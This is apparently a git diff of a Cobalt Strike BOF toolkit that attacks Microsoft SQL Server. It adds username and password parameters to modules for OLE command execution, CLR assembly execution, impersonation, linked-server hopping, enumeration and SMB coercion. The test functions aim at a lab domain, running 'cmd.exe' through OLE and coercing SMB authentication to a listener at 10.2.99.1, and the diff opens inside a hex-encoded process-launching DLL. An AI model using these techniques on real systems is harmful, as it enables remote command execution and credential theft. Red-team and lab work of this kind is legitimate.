000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000005c02000000000000000000005c0234000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000000000000000000000000000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004bc010000010053007400720069006e006700460069006c00650049006e0066006f0000009801000001003000300030003000300034006200300000002c0002000100460069006c0065004400650073006300720069007000740069006f006e000000000020000000300008000100460069006c006500560065007200730069006f006e000000000030002e0030002e0030002e003000000044001200010049006e007400650072006e0061006c004e0061006d0065000000430072006500610074006500500072006f0063006500730073002e0064006c006c0000002800020001004c006500670061006c0043006f0070007900720069006700680074000000200000004c00120001004f0072006900670069006e0061006c00460069006c0065006e0061006d0065000000430072006500610074006500500072006f0063006500730073002e0064006c006c000000340008000100500072006f006400750063007400560065007200730069006f006e00000030002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000030002e0030002e0030002e00300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000d03300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"; internal_printf("============ BASE TEST ============\n\n"); - ExecuteClrAssembly("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "CreateProcess", "18dcee3265e0143d695ef0534ef9ab29f68d772d8b04fb7cfee39275aa1b3501d974591643bcf17f0ca3836d386aea57f09657783f23a70bcce7db2ddfb80f99", bytes); + ExecuteClrAssembly("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "CreateProcess", "18dcee3265e0143d695ef0534ef9ab29f68d772d8b04fb7cfee39275aa1b3501d974591643bcf17f0ca3836d386aea57f09657783f23a70bcce7db2ddfb80f99", bytes); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - ExecuteClrAssembly("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "CreateProcess", "18dcee3265e0143d695ef0534ef9ab29f68d772d8b04fb7cfee39275aa1b3501d974591643bcf17f0ca3836d386aea57f09657783f23a70bcce7db2ddfb80f99", bytes); + ExecuteClrAssembly("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "CreateProcess", "18dcee3265e0143d695ef0534ef9ab29f68d772d8b04fb7cfee39275aa1b3501d974591643bcf17f0ca3836d386aea57f09657783f23a70bcce7db2ddfb80f99", bytes); internal_printf("\n\n============ LINK TEST ============\n\n"); - ExecuteClrAssembly("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "CreateProcess", "18dcee3265e0143d695ef0534ef9ab29f68d772d8b04fb7cfee39275aa1b3501d974591643bcf17f0ca3836d386aea57f09657783f23a70bcce7db2ddfb80f99", bytes); + ExecuteClrAssembly("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "CreateProcess", "18dcee3265e0143d695ef0534ef9ab29f68d772d8b04fb7cfee39275aa1b3501d974591643bcf17f0ca3836d386aea57f09657783f23a70bcce7db2ddfb80f99", bytes); } #endif diff --git a/src/SQL/columns/entry.c b/src/SQL/columns/entry.c index b8912cf..81db199 100644 --- a/src/SQL/columns/entry.c +++ b/src/SQL/columns/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CheckTableColumns(char* server, char* database, char* link, char* impersonate, char* table) +void CheckTableColumns(char* server, char *user, char* password, char* database, char* link, char* impersonate, char* table) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -13,11 +13,11 @@ void CheckTableColumns(char* server, char* database, char* link, char* impersona if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -131,6 +131,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* table; char* link; @@ -143,6 +145,8 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); table = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); @@ -150,6 +154,8 @@ VOID go( server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; table = *table == 0 ? NULL : table; link = *link == 0 ? NULL : link; @@ -172,7 +178,7 @@ VOID go( return; } - CheckTableColumns(server, database, link, impersonate, table); + CheckTableColumns(server, user, password, database, link, impersonate, table); printoutput(TRUE); }; @@ -182,13 +188,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckTableColumns("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "spt_monitor"); + CheckTableColumns("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "spt_monitor"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckTableColumns("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "spt_monitor"); + CheckTableColumns("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "spt_monitor"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckTableColumns("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "spt_monitor"); + CheckTableColumns("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "spt_monitor"); } #endif diff --git a/src/SQL/databases/entry.c b/src/SQL/databases/entry.c index c12bd61..71bdd6a 100644 --- a/src/SQL/databases/entry.c +++ b/src/SQL/databases/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CheckDatabases(char* server, char* database, char* link, char* impersonate) +void CheckDatabases(char* server, char* user, char* password, char* database, char* link, char* impersonate) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -13,11 +13,11 @@ void CheckDatabases(char* server, char* database, char* link, char* impersonate) if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -67,6 +67,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -78,11 +80,15 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -97,7 +103,7 @@ VOID go( return; } - CheckDatabases(server, database, link, impersonate); + CheckDatabases(server, user, password, database, link, impersonate); printoutput(TRUE); }; @@ -107,13 +113,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckDatabases("castelblack.north.sevenkingdoms.local", "master", NULL, NULL); + CheckDatabases("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckDatabases("castelblack.north.sevenkingdoms.local", "master", NULL, "sa"); + CheckDatabases("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckDatabases("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL); + CheckDatabases("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL); } #endif diff --git a/src/SQL/impersonate/entry.c b/src/SQL/impersonate/entry.c index d5f78de..f1a7818 100644 --- a/src/SQL/impersonate/entry.c +++ b/src/SQL/impersonate/entry.c @@ -3,14 +3,14 @@ #include "sql.c" -void CheckImpersonate(char* server, char* database) +void CheckImpersonate(char* server, char* user, char* password, char* database) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; SQLRETURN ret; - SQLHDBC dbc = ConnectToSqlServer(&env, server, database); + SQLHDBC dbc = ConnectToSqlServer(&env, server, user, password, database); if (dbc == NULL) { @@ -53,6 +53,8 @@ VOID go( ) { char* server = NULL; + char* user = NULL; + char* password = NULL; char* database = NULL; // @@ -62,9 +64,13 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; if(!bofstart()) @@ -72,7 +78,7 @@ VOID go( return; } - CheckImpersonate(server, database); + CheckImpersonate(server, user, password, database); printoutput(TRUE); }; @@ -82,7 +88,7 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckImpersonate("castelblack.north.sevenkingdoms.local", "master"); + CheckImpersonate("castelblack.north.sevenkingdoms.local", NULL, NULL, "master"); } #endif diff --git a/src/SQL/info/entry.c b/src/SQL/info/entry.c index 1daea4a..dee303a 100644 --- a/src/SQL/info/entry.c +++ b/src/SQL/info/entry.c @@ -58,14 +58,14 @@ void FreeSqlInfo(SQLINFO* info) { } -void GetSQLInfo(char* server, char* database) { +void GetSQLInfo(char* server, char* user, char* password, char* database) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; SQLRETURN ret; SQLINFO info; memset(&info, 0, sizeof(SQLINFO)); - SQLHDBC dbc = ConnectToSqlServer(&env, server, database); + SQLHDBC dbc = ConnectToSqlServer(&env, server, user, password, database); if (dbc == NULL) { @@ -409,6 +409,8 @@ VOID go( ) { char* server = NULL; + char* user = NULL; + char* password = NULL; char* database = NULL; // @@ -417,9 +419,13 @@ VOID go( datap parser; BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; if(!bofstart()) @@ -427,7 +433,7 @@ VOID go( return; } - GetSQLInfo(server, database); + GetSQLInfo(server, user, password, database); printoutput(TRUE); }; @@ -437,7 +443,7 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - GetSQLInfo("castelblack.north.sevenkingdoms.local", "master"); + GetSQLInfo("castelblack.north.sevenkingdoms.local", NULL, NULL, "master"); } #endif diff --git a/src/SQL/links/entry.c b/src/SQL/links/entry.c index 12add49..83ddb0b 100644 --- a/src/SQL/links/entry.c +++ b/src/SQL/links/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CheckLinks(char* server, char* database, char* link, char* impersonate) +void CheckLinks(char* server, char* user, char* password, char* database, char* link, char* impersonate) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -12,11 +12,11 @@ void CheckLinks(char* server, char* database, char* link, char* impersonate) if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -60,6 +60,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -71,11 +73,15 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -90,7 +96,7 @@ VOID go( return; } - CheckLinks(server, database, link, impersonate); + CheckLinks(server, user, password, database, link, impersonate); printoutput(TRUE); }; @@ -100,13 +106,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckLinks("castelblack.north.sevenkingdoms.local", "master", NULL, NULL); + CheckLinks("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckLinks("castelblack.north.sevenkingdoms.local", "master", NULL, "sa"); + CheckLinks("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckLinks("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL); + CheckLinks("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL); } #endif diff --git a/src/SQL/olecmd/entry.c b/src/SQL/olecmd/entry.c index 9d47073..97f0fd9 100644 --- a/src/SQL/olecmd/entry.c +++ b/src/SQL/olecmd/entry.c @@ -4,7 +4,7 @@ #include "sql_modules.c" -void ExecuteOleCmd(char* server, char* database, char* link, char* impersonate, char* command) +void ExecuteOleCmd(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* command) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -16,11 +16,11 @@ void ExecuteOleCmd(char* server, char* database, char* link, char* impersonate, if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -160,6 +160,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -172,12 +174,16 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); command = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -192,7 +198,7 @@ VOID go( return; } - ExecuteOleCmd(server, database, link, impersonate, command); + ExecuteOleCmd(server, user, password, database, link, impersonate, command); printoutput(TRUE); }; @@ -202,13 +208,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - ExecuteOleCmd("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "cmd.exe /c dir \\\\10.2.99.1\\c$"); + ExecuteOleCmd("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "cmd.exe /c dir \\\\10.2.99.1\\c$"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - ExecuteOleCmd("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "cmd.exe /c dir \\\\10.2.99.1\\c$"); + ExecuteOleCmd("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "cmd.exe /c dir \\\\10.2.99.1\\c$"); internal_printf("\n\n============ LINK TEST ============\n\n"); - ExecuteOleCmd("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "cmd.exe /c dir \\\\10.2.99.1\\c$"); + ExecuteOleCmd("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "cmd.exe /c dir \\\\10.2.99.1\\c$"); } #endif diff --git a/src/SQL/query/entry.c b/src/SQL/query/entry.c index b3a4cac..86f484a 100644 --- a/src/SQL/query/entry.c +++ b/src/SQL/query/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CustomQuery(char* server, char* database, char* link, char* impersonate, char* query) +void CustomQuery(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* query) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -13,11 +13,11 @@ void CustomQuery(char* server, char* database, char* link, char* impersonate, ch if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -65,6 +65,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -77,12 +79,16 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); query = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -102,7 +108,7 @@ VOID go( return; } - CustomQuery(server, database, link, impersonate, query); + CustomQuery(server, user, password, database, link, impersonate, query); printoutput(TRUE); }; @@ -112,13 +118,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CustomQuery("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "SELECT name, database_id FROM sys.databases;"); + CustomQuery("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "SELECT name, database_id FROM sys.databases;"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CustomQuery("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "SELECT name, database_id FROM sys.databases;"); + CustomQuery("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "SELECT name, database_id FROM sys.databases;"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CustomQuery("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "SELECT name, database_id FROM sys.databases;"); + CustomQuery("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "SELECT name, database_id FROM sys.databases;"); } #endif diff --git a/src/SQL/rows/entry.c b/src/SQL/rows/entry.c index 128c1ec..6af2fa7 100644 --- a/src/SQL/rows/entry.c +++ b/src/SQL/rows/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CheckTableRows(char* server, char* database, char* link, char* impersonate, char* table) +void CheckTableRows(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* table) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -16,11 +16,11 @@ void CheckTableRows(char* server, char* database, char* link, char* impersonate, if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -156,6 +156,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* table; char* link; @@ -168,6 +170,8 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); table = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); @@ -175,6 +179,8 @@ VOID go( server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; table = *table == 0 ? NULL : table; link = *link == 0 ? NULL : link; @@ -197,7 +203,7 @@ VOID go( return; } - CheckTableRows(server, database, link, impersonate, table); + CheckTableRows(server, user, password, database, link, impersonate, table); printoutput(TRUE); }; @@ -207,13 +213,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckTableRows("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "spt_monitor"); + CheckTableRows("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "spt_monitor"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckTableRows("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "spt_monitor"); + CheckTableRows("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "spt_monitor"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckTableRows("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "spt_monitor"); + CheckTableRows("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "spt_monitor"); } #endif diff --git a/src/SQL/search/entry.c b/src/SQL/search/entry.c index 28e22bb..65a4273 100644 --- a/src/SQL/search/entry.c +++ b/src/SQL/search/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void Search(char* server, char* database, char* link, char* impersonate, char* keyword) +void Search(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* keyword) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -14,11 +14,11 @@ void Search(char* server, char* database, char* link, char* impersonate, char* k if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -84,6 +84,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -96,12 +98,16 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); keyword = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -116,7 +122,7 @@ VOID go( return; } - Search(server, database, link, impersonate, keyword); + Search(server, user, password, database, link, impersonate, keyword); printoutput(TRUE); }; @@ -126,13 +132,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - Search("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "idle"); + Search("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "idle"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - Search("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "idle"); + Search("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "idle"); internal_printf("\n\n============ LINK TEST ============\n\n"); - Search("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "idle"); + Search("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "idle"); } #endif diff --git a/src/SQL/smb/entry.c b/src/SQL/smb/entry.c index 4b6be88..84d3c5e 100644 --- a/src/SQL/smb/entry.c +++ b/src/SQL/smb/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CoerceSmb(char* server, char* database, char* link, char* impersonate, char* listener) +void CoerceSmb(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* listener) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -15,11 +15,11 @@ void CoerceSmb(char* server, char* database, char* link, char* impersonate, char if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -82,6 +82,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -94,12 +96,16 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); listener = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -114,7 +120,7 @@ VOID go( return; } - CoerceSmb(server, database, link, impersonate, listener); + CoerceSmb(server, user, password, database, link, impersonate, listener); printoutput(TRUE); }; @@ -124,13 +130,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CoerceSmb("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "\\\\10.2.99.1"); + CoerceSmb("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "\\\\10.2.99.1"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CoerceSmb("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "\\\\10.2.99.1"); + CoerceSmb("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "\\\\10.2.99.1"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CoerceSmb("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "\\\\10.2.99.1"); + CoerceSmb("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "\\\\10.2.99.1"); } #endif diff --git a/src/SQL/tables/entry.c b/src/SQL/tables/entry.c index 46424f0..6b16fb4 100644 --- a/src/SQL/tables/entry.c +++ b/src/SQL/tables/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CheckTables(char* server, char* database, char* link, char* impersonate) +void CheckTables(char* server, char* user, char* password, char* database, char* link, char* impersonate) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -13,11 +13,11 @@ void CheckTables(char* server, char* database, char* link, char* impersonate) if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } @@ -81,6 +81,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -92,11 +94,15 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -111,7 +117,7 @@ VOID go( return; } - CheckTables(server, database, link, impersonate); + CheckTables(server, user, password, database, link, impersonate); printoutput(TRUE); }; @@ -121,13 +127,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckTables("castelblack.north.sevenkingdoms.local", "master", NULL, NULL); + CheckTables("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckTables("castelblack.north.sevenkingdoms.local", "master", NULL, "sa"); + CheckTables("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckTables("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL); + CheckTables("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL); } #endif diff --git a/src/SQL/togglemodule/entry.c b/src/SQL/togglemodule/entry.c index 59af66f..d970416 100644 --- a/src/SQL/togglemodule/entry.c +++ b/src/SQL/togglemodule/entry.c @@ -5,13 +5,13 @@ // rpc requires different functions/values than the other modules -void ToggleRpc(char* server, char* database, char* link, char* impersonate, char* value) +void ToggleRpc(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* value) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; SQLHDBC dbc = NULL; - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); if (dbc == NULL) { goto END; @@ -53,13 +53,13 @@ void ToggleRpc(char* server, char* database, char* link, char* impersonate, char // non-rpc modules are treated the same -void ToggleGenericModule(char* server, char* database, 